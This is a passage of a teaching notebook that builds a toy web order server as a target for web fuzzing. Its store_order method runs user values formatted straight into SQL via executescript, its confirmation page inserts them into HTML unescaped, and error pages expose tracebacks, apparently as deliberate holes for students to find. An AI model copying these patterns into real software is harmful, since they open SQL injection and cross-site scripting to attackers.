     "iopub.status.busy": "2025-01-16T10:12:24.372867Z",
     "iopub.status.idle": "2025-01-16T10:12:24.374529Z",
     "shell.execute_reply": "2025-01-16T10:12:24.374318Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def send_terms_and_conditions(self):\n",
    "        self.send_response(HTTPStatus.OK, \"Terms and Conditions\")\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "        self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode(\"utf8\"))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "##### Processing Orders"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form\n",
    "\n",
    "```\n",
    "<hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3\n",
    "```\n",
    "\n",
    "where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user.  Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character.\n",
    "\n",
    "If Jane Doe `<doe@example.com>` from Seattle orders a T-Shirt, this is the URL the browser creates:\n",
    "\n",
    "```\n",
    "<hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\n",
    "```"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`.  The helper method `get_field_values()` takes `self.path` and returns a dictionary of values."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 27,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.376101Z",
     "iopub.status.busy": "2025-01-16T10:12:24.376002Z",
     "iopub.status.idle": "2025-01-16T10:12:24.377489Z",
     "shell.execute_reply": "2025-01-16T10:12:24.377283Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import urllib.parse"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 28,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.378826Z",
     "iopub.status.busy": "2025-01-16T10:12:24.378752Z",
     "iopub.status.idle": "2025-01-16T10:12:24.380838Z",
     "shell.execute_reply": "2025-01-16T10:12:24.380588Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def get_field_values(self):\n",
    "        # Note: this fails to decode non-ASCII characters properly\n",
    "        query_string = urllib.parse.urlparse(self.path).query\n",
    "\n",
    "        # fields is { 'item': ['tshirt'], 'name': ['Jane Doe'], ...}\n",
    "        fields = urllib.parse.parse_qs(query_string, keep_blank_values=True)\n",
    "\n",
    "        values = {}\n",
    "        for key in fields:\n",
    "            values[key] = fields[key][0]\n",
    "\n",
    "        return values"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order.  If anything goes wrong, it sends an internal server error."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 29,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.382245Z",
     "iopub.status.busy": "2025-01-16T10:12:24.382166Z",
     "iopub.status.idle": "2025-01-16T10:12:24.383789Z",
     "shell.execute_reply": "2025-01-16T10:12:24.383575Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def handle_order(self):\n",
    "        values = self.get_field_values()\n",
    "        self.store_order(values)\n",
    "        self.send_order_received(values)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 30,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.385199Z",
     "iopub.status.busy": "2025-01-16T10:12:24.385126Z",
     "iopub.status.idle": "2025-01-16T10:12:24.387247Z",
     "shell.execute_reply": "2025-01-16T10:12:24.386875Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def store_order(self, values):\n",
    "        db = sqlite3.connect(ORDERS_DB)\n",
    "        # The following should be one line\n",
    "        sql_command = \"INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')\".format(**values)\n",
    "        self.log_message(\"%s\", sql_command)\n",
    "        db.executescript(sql_command)\n",
    "        db.commit()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 31,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.388764Z",
     "iopub.status.busy": "2025-01-16T10:12:24.388683Z",
     "iopub.status.idle": "2025-01-16T10:12:24.390656Z",
     "shell.execute_reply": "2025-01-16T10:12:24.390457Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def send_order_received(self, values):\n",
    "        # Should use html.escape()\n",
    "        values[\"item_name\"] = FUZZINGBOOK_SWAG[values[\"item\"]]\n",
    "        confirmation = HTML_ORDER_RECEIVED.format(**values).encode(\"utf8\")\n",
    "\n",
    "        self.send_response(HTTPStatus.OK, \"Order received\")\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "        self.wfile.write(confirmation)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "##### Other HTTP commands\n",
    "\n",
    "Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page.  In our case, this is always empty."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 32,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.392092Z",
     "iopub.status.busy": "2025-01-16T10:12:24.392005Z",
     "iopub.status.idle": "2025-01-16T10:12:24.393591Z",
     "shell.execute_reply": "2025-01-16T10:12:24.393366Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def do_HEAD(self):\n",
    "        # print(\"HEAD \" + self.path)\n",
    "        self.send_response(HTTPStatus.OK)\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Error Handling\n",
    "\n",
    "We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "##### Page Not Found\n",
    "\n",
    "This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 33,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.395004Z",
     "iopub.status.busy": "2025-01-16T10:12:24.394928Z",
     "iopub.status.idle": "2025-01-16T10:12:24.396593Z",
     "shell.execute_reply": "2025-01-16T10:12:24.396402Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "HTML_NOT_FOUND = \"\"\"\n",
    "<html><body>\n",
    "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
    "  <strong id=\"title\" style=\"font-size: x-large\">Sorry.</strong>\n",
    "  <p>\n",
    "  This page does not exist.  Try our <a href=\"/\">order form</a> instead.\n",
    "  </p>\n",
    "</div>\n",
    "</body></html>\n",
    "  \"\"\""
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 34,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.397923Z",
     "iopub.status.busy": "2025-01-16T10:12:24.397851Z",
     "iopub.status.idle": "2025-01-16T10:12:24.399964Z",
     "shell.execute_reply": "2025-01-16T10:12:24.399747Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Sorry.</strong>\n",
       "  <p>\n",
       "  This page does not exist.  Try our <a href=\"/\">order form</a> instead.\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 34,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(HTML_NOT_FOUND)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "The method `not_found()` takes care of sending this out with the appropriate HTTP status code."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 35,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.401365Z",
     "iopub.status.busy": "2025-01-16T10:12:24.401292Z",
     "iopub.status.idle": "2025-01-16T10:12:24.403314Z",
     "shell.execute_reply": "2025-01-16T10:12:24.403104Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def not_found(self):\n",
    "        self.send_response(HTTPStatus.NOT_FOUND, \"Not found\")\n",
    "\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "\n",
    "        message = HTML_NOT_FOUND\n",
    "        self.wfile.write(message.encode(\"utf8\"))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "##### Internal Errors\n",
    "\n",
    "This page is shown for any internal errors that might occur.  For diagnostic purposes, we have it include the traceback of the failing function."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 36,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.404746Z",
     "iopub.status.busy": "2025-01-16T10:12:24.404664Z",
     "iopub.status.idle": "2025-01-16T10:12:24.406381Z",
     "shell.execute_reply": "2025-01-16T10:12:24.406168Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "HTML_INTERNAL_SERVER_ERROR = \"\"\"\n",
    "<html><body>\n",
    "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
    "  <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n",
    "  <p>\n",
    "  The server has encountered an internal error.  Go to our <a href=\"/\">order form</a>.\n",
    "  <pre>{error_message}</pre>\n",
    "  </p>\n",
    "</div>\n",
    "</body></html>\n",
    "  \"\"\""
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 37,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.407760Z",
     "iopub.status.busy": "2025-01-16T10:12:24.407686Z",
     "iopub.status.idle": "2025-01-16T10:12:24.409632Z",
     "shell.execute_reply": "2025-01-16T10:12:24.409424Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n",
       "  <p>\n",
       "  The server has encountered an internal error.  Go to our <a href=\"/\">order form</a>.\n",
       "  <pre>{error_message}</pre>\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 37,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(HTML_INTERNAL_SERVER_ERROR)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 38,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.410967Z",
     "iopub.status.busy": "2025-01-16T10:12:24.410899Z",
     "iopub.status.idle": "2025-01-16T10:12:24.412622Z",
     "shell.execute_reply": "2025-01-16T10:12:24.412385Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import sys\n",
    "import traceback"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 39,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.414022Z",
     "iopub.status.busy": "2025-01-16T10:12:24.413949Z",
     "iopub.status.idle": "2025-01-16T10:12:24.416067Z",
     "shell.execute_reply": "2025-01-16T10:12:24.415857Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def internal_server_error(self):\n",
    "        self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, \"Internal Error\")\n",
    "\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "\n",
    "        exc = traceback.format_exc()\n",
    "        self.log_message(\"%s\", exc.strip())\n",
    "\n",
    "        message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)\n",
    "        self.wfile.write(message.encode(\"utf8\"))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Logging\n",
    "\n",
    "Our server runs as a separate process in the background, waiting to receive commands at all time.  To see what it is doing, we implement a special logging mechanism.  The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them.  We use this to pass log messages from the server, which we can then display in the notebook."
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "For multiprocessing, we use the `multiprocess` module - a variant of the standard Python `multiprocessing` module that also works in notebooks. If you are running this code outside a notebook, you can also use `multiprocessing` instead."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 40,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.417436Z",
     "iopub.status.busy": "2025-01-16T10:12:24.417361Z",
     "iopub.status.idle": "2025-01-16T10:12:24.429548Z",
     "shell.execute_reply": "2025-01-16T10:12:24.429284Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from multiprocess import Queue  # type: ignore"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 41,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.431073Z",
     "iopub.status.busy": "2025-01-16T10:12:24.430951Z",
     "iopub.status.idle": "2025-01-16T10:12:24.436844Z",
     "shell.execute_reply": "2025-01-16T10:12:24.436596Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "HTTPD_MESSAGE_QUEUE = Queue()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us place two messages in the queue:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 42,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.438436Z",
     "iopub.status.busy": "2025-01-16T10:12:24.438335Z",
     "iopub.status.idle": "2025-01-16T10:12:24.440290Z",
     "shell.execute_reply": "2025-01-16T10:12:24.440056Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "HTTPD_MESSAGE_QUEUE.put(\"I am another message\")"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 43,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.441608Z",
     "iopub.status.busy": "2025-01-16T10:12:24.441521Z",
     "iopub.status.idle": "2025-01-16T10:12:24.443102Z",
     "shell.execute_reply": "2025-01-16T10:12:24.442902Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "HTTPD_MESSAGE_QUEUE.put(\"I am one more message\")"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To distinguish server messages from other parts of the notebook, we format them specially:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 44,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.444363Z",
     "iopub.status.busy": "2025-01-16T10:12:24.444281Z",
     "iopub.status.idle": "2025-01-16T10:12:24.445733Z",
     "shell.execute_reply": "2025-01-16T10:12:24.445520Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from bookutils import rich_output, terminal_escape"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 45,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.447047Z",
     "iopub.status.busy": "2025-01-16T10:12:24.446961Z",
     "iopub.status.idle": "2025-01-16T10:12:24.448643Z",
     "shell.execute_reply": "2025-01-16T10:12:24.448439Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "def display_httpd_message(message: str) -> None:\n",
    "    if rich_output():\n",
    "        display(\n",
    "            HTML(\n",
    "                '<pre style=\"background: NavajoWhite;\">' +\n",
    "                message +\n",
    "                \"</pre>\"))\n",
    "    else:\n",
    "        print(terminal_escape(message))"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 46,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.449910Z",
     "iopub.status.busy": "2025-01-16T10:12:24.449833Z",
     "iopub.status.idle": "2025-01-16T10:12:24.451794Z",
     "shell.execute_reply": "2025-01-16T10:12:24.451589Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">I am a httpd server message</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "display_httpd_message(\"I am a httpd server message\")"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The method `print_httpd_messages()` prints all messages accumulated in the queue so far:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 47,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.453200Z",
     "iopub.status.busy": "2025-01-16T10:12:24.453122Z",
     "iopub.status.idle": "2025-01-16T10:12:24.454679Z",
     "shell.execute_reply": "2025-01-16T10:12:24.454472Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "def print_httpd_messages():\n",
    "    while not HTTPD_MESSAGE_QUEUE.empty():\n",
    "        message = HTTPD_MESSAGE_QUEUE.get()\n",
    "        display_httpd_message(message)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 48,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.456081Z",
     "iopub.status.busy": "2025-01-16T10:12:24.456008Z",
     "iopub.status.idle": "2025-01-16T10:12:24.457470Z",
     "shell.execute_reply": "2025-01-16T10:12:24.457249Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import time"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 49,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.458961Z",
     "iopub.status.busy": "2025-01-16T10:12:24.458855Z",
     "iopub.status.idle": "2025-01-16T10:12:25.467076Z",
     "shell.execute_reply": "2025-01-16T10:12:25.466783Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">I am another message</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    },
    {
     "data": {
      "text/html": [
       "<pre style=\"background: NavajoWhite;\">I am one more message</pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "time.sleep(1)\n",
    "print_httpd_messages()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "With `clear_httpd_messages()`, we can silently discard all pending messages:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 50,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.468947Z",
     "iopub.status.busy": "2025-01-16T10:12:25.468825Z",
     "iopub.status.idle": "2025-01-16T10:12:25.470599Z",
     "shell.execute_reply": "2025-01-16T10:12:25.470355Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "def clear_httpd_messages() -> None:\n",
    "    while not HTTPD_MESSAGE_QUEUE.empty():\n",
    "        HTTPD_MESSAGE_QUEUE.get()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The method `log_message()` in the request handler makes use of the queue to store its messages:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 51,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.472104Z",
     "iopub.status.busy": "2025-01-16T10:12:25.472002Z",
     "iopub.status.idle": "2025-01-16T10:12:25.473946Z",
     "shell.execute_reply": "2025-01-16T10:12:25.473717Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def log_message(self, format: str, *args) -> None:\n",
    "        message = (\"%s - - [%s] %s\\n\" %\n",
    "                   (self.address_string(),\n",
    "                    self.log_date_time_string(),\n",
    "                    format % args))\n",
    "        HTTPD_MESSAGE_QUEUE.put(message)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL.  We now extend it such that it also prints out any log messages produced by the server:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 52,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.475406Z",
     "iopub.status.busy": "2025-01-16T10:12:25.475296Z",
     "iopub.status.idle": "2025-01-16T10:12:25.513382Z",
     "shell.execute_reply": "2025-01-16T10:12:25.513111Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import requests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 53,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.515114Z",
     "iopub.status.busy": "2025-01-16T10:12:25.515020Z",
     "iopub.status.idle": "2025-01-16T10:12:25.517016Z",
     "shell.execute_reply": "2025-01-16T10:12:25.516784Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "def webbrowser(url: str, mute: bool = False) -> str:\n",
    "    \"\"\"Download and return the http/https resource given by the URL\"\"\"\n",
    "\n",
    "    try:\n",
    "        r = requests.get(url)\n",
    "        contents = r.text\n",
    "    finally:\n",
    "        if not mute:\n",
    "            print_httpd_messages()\n",
    "        else:\n",
    "            clear_httpd_messages()\n",
    "\n",
    "    return contents"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "With `webbrowser()`, we are now ready to get the Web server up and running.  "
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### End of Excursion"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Running the Server\n",
    "\n",
    "We run the server on the *local host* – that is, the same machine which also runs this notebook.  We check for an accessible port and put the resulting URL in the queue created earlier."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 54,
   "metadata": {
    "button": false,
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.518618Z",
     "iopub.status.busy": "2025-01-16T10:12:25.518532Z",
     "iopub.status.idle": "2025-01-16T10:12:25.520571Z",
     "shell.execute_reply": "2025-01-16T10:12:25.520358Z"
    },
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "def run_httpd_forever(handler_class: type) -> NoReturn:  # type: ignore\n",
    "    host = \"127.0.0.1\"  # localhost IP\n",
    "    for port in range(8800, 9000):\n",
    "        httpd_address = (host, port)\n",
    "\n",
    "        try:\n",
    "            httpd = HTTPServer(httpd_address, handler_class)\n",
    "            break\n",
    "        except OSError:\n",
    "            continue\n",
    "\n",
    "    httpd_url = \"http://\" + host + \":\" + repr(port)\n",
    "    HTTPD_MESSAGE_QUEUE.put(httpd_url)\n",
    "    httpd.serve_forever()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocess` module.  It retrieves its URL from the message queue and returns it, such that we can start talking to the server."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 55,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.521954Z",
     "iopub.status.busy": "2025-01-16T10:12:25.521878Z",
     "iopub.status.idle": "2025-01-16T10:12:25.523420Z",
     "shell.execute_reply": "2025-01-16T10:12:25.523184Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from multiprocess import Process"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 56,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.524775Z",
     "iopub.status.busy": "2025-01-16T10:12:25.524697Z",
     "iopub.status.idle": "2025-01-16T10:12:25.526524Z",
     "shell.execute_reply": "2025-01-16T10:12:25.526290Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \\\n",
    "        -> Tuple[Process, str]:\n",
    "    clear_httpd_messages()\n",
    "\n",
    "    httpd_process = Process(target=run_httpd_forever, args=(handler_class,))\n",
    "    httpd_process.start()\n",
    "\n",
    "    httpd_url = HTTPD_MESSAGE_QUEUE.get()\n",
    "    return httpd_process, httpd_url"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Let us now start the server and save its URL:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 57,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.527975Z",
     "iopub.status.busy": "2025-01-16T10:12:25.527895Z",
     "iopub.status.idle": "2025-01-16T10:12:25.537420Z",
     "shell.execute_reply": "2025-01-16T10:12:25.537033Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/plain": [
       "'http://127.0.0.1:8800'"
      ]
     },
     "execution_count": 57,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "httpd_process, httpd_url = start_httpd()\n",
    "httpd_url"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Interacting with the Server\n",
    "\n",
    "Let us now access the server just created."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Direct Browser Access\n",
    "\n",
    "If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL.  Simply open the address in `httpd_url` by clicking on the link below.\n",
    "\n",
    "**Note**: This only works if you are running the Jupyter notebook server on the local host."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 58,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:25.539209Z",
     "iopub.status.busy": "2025-01-16T10:12:25.539070Z",
     "iopub.status.idle": "2025-01-16T10:12:25.541260Z",
     "shell.execute_reply": "2025-01-16T10:12:25.541035Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "def print_url(url: str) -> None:\n",
    "    if rich_output():\n",
